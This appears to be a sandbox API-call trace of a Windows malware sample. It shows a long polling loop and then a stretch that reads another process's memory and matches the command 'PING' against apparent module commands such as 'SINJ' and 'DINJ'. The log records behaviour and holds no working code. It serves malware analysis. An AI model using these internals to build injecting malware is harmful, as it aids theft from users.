	[0224.204] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.204] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.204] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.204] Sleep (dwMilliseconds=0xbb8) 
	[0224.220] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.220] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.220] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.220] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.220] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.220] Sleep (dwMilliseconds=0xbb8) 
	[0224.235] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.236] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.236] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.236] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.236] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.236] Sleep (dwMilliseconds=0xbb8) 
	[0224.251] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.251] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.251] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.251] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.251] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.251] Sleep (dwMilliseconds=0xbb8) 
	[0224.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.266] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.266] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.266] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.266] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.267] Sleep (dwMilliseconds=0xbb8) 
	[0224.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.282] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.282] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.282] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.282] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.282] Sleep (dwMilliseconds=0xbb8) 
	[0224.298] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.298] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.298] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.298] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.298] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.298] Sleep (dwMilliseconds=0xbb8) 
	[0224.314] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.314] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.314] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.314] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.314] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.314] Sleep (dwMilliseconds=0xbb8) 
	[0224.329] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.329] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.329] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.329] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.329] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.329] Sleep (dwMilliseconds=0xbb8) 
	[0224.344] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.344] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.344] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.344] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.344] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.344] Sleep (dwMilliseconds=0xbb8) 
	[0224.360] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.360] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.360] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.360] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.360] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.360] Sleep (dwMilliseconds=0xbb8) 
	[0224.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.377] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.377] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.377] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.377] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.377] Sleep (dwMilliseconds=0xbb8) 
	[0224.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.391] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.392] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.392] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.392] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.392] Sleep (dwMilliseconds=0xbb8) 
	[0224.407] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.407] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.408] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.408] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.408] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.408] Sleep (dwMilliseconds=0xbb8) 
	[0224.424] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.424] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.424] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.424] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.424] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.424] Sleep (dwMilliseconds=0xbb8) 
	[0224.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.456] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.456] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.456] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.456] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.456] Sleep (dwMilliseconds=0xbb8) 
	[0224.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.469] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.469] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.469] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.469] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.469] Sleep (dwMilliseconds=0xbb8) 
	[0224.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.485] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.485] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.485] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.485] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.485] Sleep (dwMilliseconds=0xbb8) 
	[0224.500] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.500] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.500] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.500] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.500] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.501] Sleep (dwMilliseconds=0xbb8) 
	[0224.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.522] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.522] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.522] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.522] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.522] Sleep (dwMilliseconds=0xbb8) 
	[0224.531] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.531] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.531] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.532] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.532] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.532] Sleep (dwMilliseconds=0xbb8) 
	[0224.547] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.547] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.547] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.547] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.547] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.547] Sleep (dwMilliseconds=0xbb8) 
	[0224.579] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.579] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.579] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.579] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.579] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.579] Sleep (dwMilliseconds=0xbb8) 
	[0224.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.595] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.595] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.595] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.595] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.595] Sleep (dwMilliseconds=0xbb8) 
	[0224.610] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.610] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.610] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.610] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.610] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.610] Sleep (dwMilliseconds=0xbb8) 
	[0224.626] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.626] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.627] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.627] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.627] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.627] Sleep (dwMilliseconds=0xbb8) 
	[0224.642] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.642] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.642] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.642] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.642] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.643] Sleep (dwMilliseconds=0xbb8) 
	[0224.656] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.656] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.656] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.656] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.657] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0224.657] Sleep (dwMilliseconds=0xbb8) 
	[0224.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b40
	[0224.672] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0224.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0224.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x274e360
	[0224.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0224.672] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0224.672] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225d20, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225d20*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0224.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0224.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7620
	[0224.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x22b7620, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0224.672] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x274e360, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x274e360, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0224.673] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225eb8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225eb8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0224.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0224.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b68
	[0224.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x2778b68, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0224.673] SetEvent (hEvent=0x474) returned 1
	[0224.673] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0224.673] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x274e360) returned 1
	[0224.673] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0224.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b90
	[0224.673] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0224.673] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0224.673] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0224.673] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0224.673] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0224.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7608
	[0224.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2778b40, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xa40) returned 0x580
	[0224.674] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778bb8
	[0224.674] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.675] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.675] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778bb8) returned 1
	[0224.675] Sleep (dwMilliseconds=0xbb8) 
	[0224.688] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.688] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.688] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.688] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.688] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.688] Sleep (dwMilliseconds=0xbb8) 
	[0224.704] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.704] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.704] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.704] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.704] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.704] Sleep (dwMilliseconds=0xbb8) 
	[0224.719] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.719] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.719] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.719] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.719] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.719] Sleep (dwMilliseconds=0xbb8) 
	[0224.734] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.734] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.734] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.735] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.735] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.735] Sleep (dwMilliseconds=0xbb8) 
	[0224.750] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.750] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.750] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.750] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.750] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.750] Sleep (dwMilliseconds=0xbb8) 
	[0224.766] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.766] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.766] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.766] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.766] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.766] Sleep (dwMilliseconds=0xbb8) 
	[0224.784] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.784] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.784] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.784] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.784] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.784] Sleep (dwMilliseconds=0xbb8) 
	[0224.797] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.797] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.797] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.797] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.797] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.797] Sleep (dwMilliseconds=0xbb8) 
	[0224.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.813] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.813] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.813] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.813] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.813] Sleep (dwMilliseconds=0xbb8) 
	[0224.828] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.828] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.828] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.828] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.828] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.828] Sleep (dwMilliseconds=0xbb8) 
	[0224.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.881] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.882] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.882] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.882] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.882] Sleep (dwMilliseconds=0xbb8) 
	[0224.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.890] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.891] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.891] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.891] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.891] Sleep (dwMilliseconds=0xbb8) 
	[0224.918] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.918] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.918] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.918] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.918] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.918] Sleep (dwMilliseconds=0xbb8) 
	[0224.922] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.922] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.922] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.922] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.922] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.922] Sleep (dwMilliseconds=0xbb8) 
	[0224.937] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.937] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.937] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.937] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.937] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.937] Sleep (dwMilliseconds=0xbb8) 
	[0224.953] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.953] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.953] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.953] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.953] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
	[0224.953] Sleep (dwMilliseconds=0xbb8) 
	[0224.968] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.968] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0224.968] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0224.968] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0224.968] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778dc0) returned 1
